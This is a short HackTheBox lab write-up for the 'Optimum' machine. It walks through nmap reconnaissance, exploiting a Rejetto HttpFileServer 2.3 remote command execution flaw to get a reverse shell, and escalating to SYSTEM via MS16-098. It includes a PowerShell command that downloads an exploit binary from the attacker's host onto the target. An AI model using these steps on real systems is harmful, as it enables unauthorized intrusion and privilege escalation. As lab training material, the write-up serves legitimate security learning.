Optimum

An easy Windows box from HackTheBox, running a CVE POC to get initial access, and then another POC to get SYSTEM.

Optimum

Recon

Runnning the usual nmap

sudo nmap -sC -sV -oA nmap/optimum 10.10.10.8

Nmap scan report for 10.10.10.8  
Host is up (0.038s latency).  
Not shown: 999 filtered tcp ports (no-response)  
PORT   STATE SERVICE VERSION  
80/tcp open  http    HttpFileServer httpd 2.3  
|_http-title: HFS /  
|_http-server-header: HFS 2.3  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

See there is a service called “HTTP File Server” on port 80, version 2.3 - run a searchsploit against it

searchsploit httpfileserver 2.3

And find that there is a RCE for the version, with a python script

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)

Exploitation

Download the exploit to current directory, and run it like so

python hfs.py 10.10.10.8 80 "ping 10.10.14.11"

With tcpdump listening for pings

sudo tcpdump icmp

The one from searchsploit didn’t work, but using another python script off of exploitdb it worked, it had a reverse shell baked in as well - now have shell on the system as “kostas”

Get the system info of the machine with

systeminfo

And save the out put to a txt file, and run it against windows exploit suggester after updating it

wes -u

wes sysinfo

To find the system vulnerable to MS16-098

Download the exe exploit from github, put it on the box and execute

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11/41020.exe','C:\Users\kostas\Desktop\41020.exe

powershell 39719.ps1

And are now system!

Optimum

Optimum #

Recon #

Exploitation #

Optimum

Recon

Exploitation